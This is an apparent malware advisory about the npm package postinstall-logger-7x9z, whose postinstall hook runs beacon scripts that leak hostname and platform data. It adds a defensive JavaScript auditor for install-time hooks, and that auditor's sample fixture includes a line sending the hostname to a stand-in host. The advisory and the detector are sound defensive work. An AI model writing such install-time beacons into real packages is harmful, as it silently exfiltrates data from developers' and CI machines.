MAL-2026-5738
Malicious code in postinstall-logger-7x9z (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (6e89b603ffc718873a9d4c42167bf0c667c995cc2547bc9b99373ad4e9f0ca1e)

On install, package.json's postinstall hook (`"postinstall": "node run.js"`) triggers execution of bundled beacon scripts (`beacon15.js` and `beacon_linux.js`). These scripts pull in the `child_process`, `os`, and `http` modules and issue outbound HTTP GET/POST requests carrying host identifiers including `os.hostname()` and `os.platform()`. The combination of automatic execution at install time, host-information collection, and outbound HTTP requests to a hardcoded destination is the canonical install-time exfiltration beacon shape. Any developer or CI system running `npm install` for this package will silently leak host data and execute code from the bundled scripts under the installing user's privileges.
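A static pre-install check for the shape described above, as an added example (not code from the advisory or from Amazon Inspector): it finds install-time lifecycle hooks, follows local `require` calls from the hooked script, and flags host-information calls combined with an HTTP client. The names `auditPackage`, `reachable` and `SAMPLE` are hypothetical, the regex heuristics are an assumption about what is worth flagging, and the sample file bodies are constructed; only the file names and the hook line come from the advisory.

```javascript
// Added example: static audit for the install-time beacon shape in the advisory.
const HOOKS = ["preinstall", "install", "postinstall"]; // npm install-time lifecycle hooks
const MODULES = ["child_process", "os", "http", "https"];

// Follow require("./x") from an entry file; `files` maps relative path -> source text.
function reachable(files, entry, seen = new Set()) {
  const name = entry.replace(/^\.\//, "");
  if (seen.has(name) || !(name in files)) return seen;
  seen.add(name);
  for (const m of files[name].matchAll(/require\(\s*["'](\.\/[^"']+)["']\s*\)/g)) {
    reachable(files, m[1].endsWith(".js") ? m[1] : m[1] + ".js", seen);
  }
  return seen;
}

// Return one finding per install hook declared in package.json.
function auditPackage(files) {
  const scripts = JSON.parse(files["package.json"]).scripts || {};
  const findings = [];
  for (const hook of HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    // Only `node <file>.js` commands are resolved; other commands are reported unscanned.
    const entry = (cmd.match(/\bnode\s+(\S+\.js)\b/) || [])[1];
    const scanned = entry ? [...reachable(files, entry)] : [];
    const src = scanned.map((f) => files[f]).join("\n");
    const modules = MODULES.filter((m) =>
      new RegExp(`require\\(\\s*["'](node:)?${m}["']\\s*\\)`).test(src));
    const hostInfo = [...new Set(src.match(/\bos\.(hostname|platform|userInfo)\b/g) || [])];
    const network = modules.some((m) => m.startsWith("http"));
    // Beacon shape: runs at install time, reads host identifiers, has an HTTP client.
    findings.push({ hook, cmd, scanned, modules, hostInfo,
      beaconShape: network && hostInfo.length > 0 });
  }
  return findings;
}

// Constructed sample: file names and hook line from the advisory, file bodies invented.
const SAMPLE = {
  "package.json": JSON.stringify({ name: "sample-pkg", scripts: { postinstall: "node run.js" } }),
  "run.js": 'require("./beacon15.js"); require("./beacon_linux.js");',
  "beacon15.js": 'const os = require("os"), http = require("http");\n' +
    'http.get("http://example.invalid/?h=" + os.hostname());',
  "beacon_linux.js": 'const cp = require("child_process"), os = require("os");\n' +
    'const p = os.platform();',
};

console.log(JSON.stringify(auditPackage(SAMPLE), null, 2));
```

Run it over an unpacked tarball (for example the output of `npm pack <name>`) rather than an installed tree, and install with `npm install --ignore-scripts` while a package is under review so the hook never fires.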
Affected packages
No fixed version published yet for postinstall-logger-7x9z (npm). Pin to a known-safe version or switch to an alternative.